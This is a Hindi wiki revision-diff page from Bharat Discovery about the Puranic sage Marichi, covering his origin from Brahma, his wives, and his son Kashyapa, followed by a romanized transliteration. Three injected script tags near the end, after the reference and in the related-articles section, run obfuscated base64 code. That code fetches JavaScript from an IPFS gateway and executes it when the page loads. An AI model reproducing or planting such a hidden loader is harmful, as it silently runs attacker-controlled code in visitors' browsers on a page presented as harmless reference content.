Difference between revisions of "मरीचि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (1 अवतरण)
 
(11 intermediate revisions by 6 users not shown)
Line 1: Line 1:
 +
'''मरीचि''' [[हिन्दू]] पौराणिक ग्रंथ [[महाभारत]] के अनुसार एक [[ऋषि]] थे।
 +
* [[ब्रह्मा]] के दस मानस पुत्रों में से एक मरीचि की उत्पत्ति ब्रह्माजी के नेत्र से हुई थी।
 +
* इनकी पत्नी दक्ष-कन्या संभूति थी तथा [[भागवतपुराण|भागवत]] में इनकी पत्नियों के नाम कर्दम्कन्या कला और ऊर्णा मिलते हैं। दक्ष के [[यज्ञ]] में इन्होंने भी [[शिव|शंकर भगवान]] का अपमान किया था। जिसके कारण शंकर भगवान ने इसे भस्म कर डाला।
 +
* मरीचि के अनुसार मानसिक व्याधि चार प्रकार की होती है- भोग्य, गोप्य, प्रत्यक्ष और अज्ञात।
 +
* इन्होंने ही [[भृगु]] को दण्डनीति की शिक्षा दी है। ये सुमेरु के एक शिखर पर निवास करते हैं और महाभारत में इन्हें चित्रशिखण्डी कहा गया है।
 +
* ब्रह्मा ने पुष्करक्षेत्र में जो यज्ञ किया था उसमें ये अच्छावाक् पद पर नियुक्त हुए थे। दस हजार श्लोकों से युक्त ब्रह्मपुराण का दान
 +
पहले-पहल ब्रह्मा ने इन्हीं को किया था।
 +
* [[वेद]] और [[पुराण|पुराणों]] में इनके चरित्र का चर्चा मिलती है।
 +
*मरीचि ने कला नाम की स्त्री से विवाह किया और उनसे उन्हें [[कश्यप]] नामक एक पुत्र मिला। कश्यप की माता 'कला' [[कर्दम]] ऋषि की पुत्री और ऋषि [[कपिल मुनि|कपिल]] देव की बहन थी।
 +
* ब्रह्मा के पोते और मरीचि के पुत्र कश्यप ने ब्रह्मा के दूसरे पुत्र दक्ष की 13 पुत्रियों से विवाह किया।
 +
* मुख्यत इन्हीं कन्याओं से सृष्टि का विकास हुआ और कश्यप सृष्टिकर्ता कहलाए।<ref>{{cite web |url=http://hindi.webdunia.com/article/sanatan-dharma-history/%E0%A4%AC%E0%A5%8D%E0%A4%B0%E0%A4%B9%E0%A5%8D%E0%A4%AE%E0%A4%BE-%E0%A4%95%E0%A5%87-%E0%A4%AA%E0%A4%B9%E0%A4%B2%E0%A5%87-%E0%A4%AA%E0%A5%81%E0%A4%A4%E0%A5%8D%E0%A4%B0-%E0%A4%AE%E0%A4%B0%E0%A5%80%E0%A4%9A%E0%A4%BF-%E0%A4%95%E0%A4%BE-%E0%A4%95%E0%A5%81%E0%A4%B2-113100800070_1.htm |title=ब्रह्मा के पहले पुत्र मरीचि का कुल |accessmonthday= 24 दिसम्बर|accessyear=2015 |last= |first= |authorlink= |format= html|publisher=वेब दुनिया |language=हिन्दी }}</ref>
 +
 +
{{विशेष|लंका के राजा [[रावण]] के मामा, सुण्ड एवं [[ताड़का]] के पुत्र के लिए देखें [[मारीच]]}}
  
==मरीचि / Marichi==
 
  
1. [[ब्रह्मा]] के दस मानास पुत्रों में से एक जिसकी उत्पत्ति उनके नेत्र से हुई थी। यह [[दक्ष]] का दामाद और [[शंकर]] का साढू था। इसकी पत्नि दक्ष-कन्या संभूति थी। भागवत में पत्नियों के नाम कर्दम्कन्या कला और ऊर्णा मिलते हैं। दक्ष के यज्ञ में इसने भी शंकर का अपमान किया था। इस पर शंकर ने इसे भस्म कर डाला।
+
==टीका-टिप्पणी और संदर्भ==
 
+
<references/>
2. एक धर्मशास्त्रकार जिसके मतों के उदाहरण विभिन्न प्राचीन ग्रंथो से मिलते हैं। अचल संपत्ति के संबंध में मरीचि का कथन है - यदि अचल संपत्ति किसी के हाथ बेचनी है,खरीदनी है,दान में देनी है अथवा उसका बंटवारा होना है तो यह सारे कार्य मौखिक न होकर लिखित होने चाहिए। तभी ये कार्य नियमानुकुल हैं।
+
==संबंधित लेख==
 
+
{{ऋषि मुनि2}}{{पौराणिक चरित्र}}
मरीचि के अनुसार मानसिक व्याधि चार प्रकार की होती है- भोग्य,गोप्य,प्रत्यक्ष और अज्ञात ।
+
[[Category:ऋषि मुनि]]
 
+
[[Category:पौराणिक कोश]] [[Category:पौराणिक चरित्र]]
{{ॠषि-मुनि}}
+
[[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
 
 
 
[[Category:पौराणिक कोश]] [[Category:ॠषि मुनि]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 08:21, 24 December 2015

marichi hindoo pauranik granth mahabharat ke anusar ek rrishi the.

  • brahma ke das manas putroan mean se ek marichi ki utpatti brahmaji ke netr se huee thi.
  • inaki patni daksh-kanya sanbhooti thi tatha bhagavat mean inaki patniyoan ke nam kardamkanya kala aur oorna milate haian. daksh ke yajn mean inhoanne bhi shankar bhagavan ka apaman kiya tha. jisake karan shankar bhagavan ne ise bhasm kar dala.
  • marichi ke anusar manasik vyadhi char prakar ki hoti hai- bhogy, gopy, pratyaksh aur ajnat.
  • inhoanne hi bhrigu ko dandaniti ki shiksha di hai. ye sumeru ke ek shikhar par nivas karate haian aur mahabharat mean inhean chitrashikhandi kaha gaya hai.
  • brahma ne pushkarakshetr mean jo yajn kiya tha usamean ye achchhavakh pad par niyukt hue the. das hajar shlokoan se yukt brahmapuran ka dan

pahale-pahal brahma ne inhian ko kiya tha.

  • ved aur puranoan mean inake charitr ka charcha milati hai.
  • marichi ne kala nam ki stri se vivah kiya aur unase unhean kashyap namak ek putr mila. kashyap ki mata 'kala' kardam rrishi ki putri aur rrishi kapil dev ki bahan thi.
  • brahma ke pote aur marichi ke putr kashyap ne brahma ke doosare putr daksh ki 13 putriyoan se vivah kiya.
  • mukhyat inhian kanyaoan se srishti ka vikas hua aur kashyap srishtikarta kahalae.[1]
  1. REDIRECTsaancha:Headnote


tika-tippani aur sandarbh

  1. brahma ke pahale putr marichi ka kul (hindi) (html) veb duniya. abhigaman tithi: 24 disambar, 2015.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>